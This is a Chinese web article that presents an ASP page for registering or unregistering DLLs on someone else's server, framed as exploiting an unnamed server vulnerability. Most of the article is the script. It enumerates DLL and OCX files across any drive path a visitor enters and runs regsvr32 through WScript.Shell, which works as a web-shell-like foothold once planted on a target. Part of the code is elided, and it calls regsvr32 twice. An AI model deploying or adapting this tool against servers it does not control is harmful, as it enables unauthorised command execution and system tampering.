您的位置：首页 → 资讯 → 网络应用 → 利用对方服务器漏洞远程注册DLL

利用对方服务器漏洞远程注册DLL

时间：2010/1/19 11:10:00来源：本站整理作者：我要评论(0)

利用对方服务器漏洞远程注册DLL：

         其实，我们在ASP中，是有捷径远程注册DLL的，但需要对方服务器漏洞的“配合”（什么漏洞？我可什么都没说啊，自己看）。试试下面的代码，或许侥幸成功呢：
<% Response.Buffer = True %>
<% Server.ScriptTimeout = 500
Dim frmFolderPath, frmFilePath

frmFolderPath = Request.Form("frmFolderPath")
frmFilePath = Request.Form("frmDllPath")
frmMethod = Request.Form("frmMethod")
btnREG = Request.Form("btnREG")
%>

<HTML>
<HEAD>
  <TITLE>精彩春风之远程注册DLL</TITLE>
  <STYLE TYPE="TEXT/CSS">
  .Legend {FONT-FAMILY: veranda; FONT-SIZE: 14px; FONT-WEIGHT: bold; COLOR: blue}
  .FS {FONT-FAMILY: veranda; FONT-SIZE: 12px; BORDER-WIDTH: 4px; BORDER-COLOR: green;
    MARGIN-LEFT:2px; MARGIN-RIGHT:2px}
  TD {MARGIN-LEFT:6px; MARGIN-RIGHT:6px; PADDING-LEFT:12px; PADDING-RIGHT:12px}
  </STYLE>
</HEAD>

<BODY>
<FORM NAME="regForm" METHOD="POST">
<TABLE BORDER=0 CELLSPACING=6 CELLPADDING=6 MARGINWIDTH=6>
<TR>
  <TD VALIGN=TOP>
  <FIELDSET ID=FS1 NAME=FS1 CLASS=FS>
  <LEGEND CLASS=Legend>注册DLL</LEGEND>
  敲入到DLL目录的路径

  <INPUT TYPE=TEXT NAME="frmFolderPath" VALUE="<%=frmFolderPath%>">

  <INPUT TYPE=SUBMIT NAME=btnFileList VALUE="创建文件列表">

<%
IF Request.Form("btnFileList") <> "" OR btnREG <> "" Then
    Set RegisterFiles = New clsRegister
      RegisterFiles.EchoB("Select File")
      Call RegisterFiles.init(frmFolderPath)
      RegisterFiles.EchoB("
<INPUT TYPE=SUBMIT NAME=btnREG VALUE=" & Chr(34) _
& "REG/UNREG" & Chr(34) & ">")
    IF Request.Form("btnREG") <> "" Then
      Call RegisterFiles.Register(frmFilePath, frmMethod)
    End IF
    Set RegisterFiles = Nothing
  End IF
%>
  </FIELDSET>
  </TD>
</TR>
</TABLE>
</FORM>
</BODY>
</HTML>
<%
Class clsRegister

Private m_oFS

Public Property Let oFS(objOFS)
m_oFS = objOFS
End Property
……
Sub init(strRoot) 'Root to Search (c:, d:, e:)
Dim oDrive, oRootDir
IF oFS.FolderExists(strRoot) Then
IF Len(strRoot) < 3 Then 'Must Be a Drive
Set oDrive = oFS.GetDrive(strRoot)
Set oRootDir = oDrive.RootFolder
Else
Set oRootDir = oFS.GetFolder(strRoot)
End IF
Else
EchoB("噢,文件夹( " & strRoot & " )没找到!")
      Exit Sub
    End IF
    setRoot = oRootDir
    
    Echo("<SELECT NAME=" & Chr(34) & "frmDllPath" & Chr(34) & ">")
      Call getAllDlls(oRootDir)
    EchoB("</SELECT>")
    BuildOptions
  End Sub
  
  Sub getAllDlls(oParentFolder)
  Dim oSubFolders, oFile, oFiles
    Set oSubFolders = oParentFolder.SubFolders
    Set opFiles = oParentFolder.Files
    
    For Each oFile in opFiles
      IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
        Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
        & oFile.Name & "</Option>")
      End IF
    Next
    
    On Error Resume Next
    For Each oFolder In oSubFolders 'Iterate All Folders in Drive
      Set oFiles = oFolder.Files
      For Each oFile in oFiles
        IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
          Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
          & oFile.Name & "</Option>")
        End IF
      Next
      Call getAllDlls(oFolder)
    Next
    On Error GoTo 0
  End Sub

  Sub Register(strFilePath, regMethod)
  Dim theFile, strFile, oShell, exitcode
    Set theFile = oFS.GetFile(strFilePath)
    strFile = theFile.Path

    Set oShell = CreateObject ("WScript.Shell")

    IF regMethod = "REG" Then 'Register
      oShell.Run "c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False
      exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False)
       EchoB("regsvr32.exe exitcode = " & exitcode)
    Else 'unRegister
      oShell.Run "c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False
      exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False)
       EchoB("regsvr32.exe exitcode = " & exitcode)
    End IF
    
    Cleanup oShell
  End Sub
  
  Sub BuildOptions
    EchoB("Register: <INPUT TYPE=RADIO NAME=frmMethod VALUE=REG CHECKED>")
    EchoB("unRegister: <INPUT TYPE=RADIO NAME=frmMethod VALUE=UNREG>")
  End Sub
  
  Function Echo(str)
    Echo = Response.Write(str & vbCrLf)
  End Function
  
  Function EchoB(str)
    EchoB = Response.Write(str & "
" & vbCrLf)
  End Function
  
  Sub Cleanup(obj)
    If isObject(obj) Then
      Set obj = Nothing
    End IF
  End Sub
  
  Sub Class_Terminate()
    Cleanup oFS
  End Sub
End Class
%>

 

相关阅读 360se.exe应用程序出错 计算机中丢失demaxiya.dll解决方法msvcr100.dll丢失 QQ提示msvcr100.dll报错解决方法侠客风云传前传没有找到dll怎么办 前传没有找到dll解决方法pgort100.dll丢失 QQ提示pgort100.dll报错解决方法急难先锋2016缺少msvcp140.dll解决办法小兵步枪丢失openal32.dll怎么办 丢失openal32.dll解决方法装驱动提示ksuser.dll丢失或没有找到ksuser.dll的解决方法使命召唤10msvcp100.dll丢失怎么办 msvcp100.dll丢失解决办法

文章评论

查看所有0条评论>>

发表评论

我来说两句...

提交评论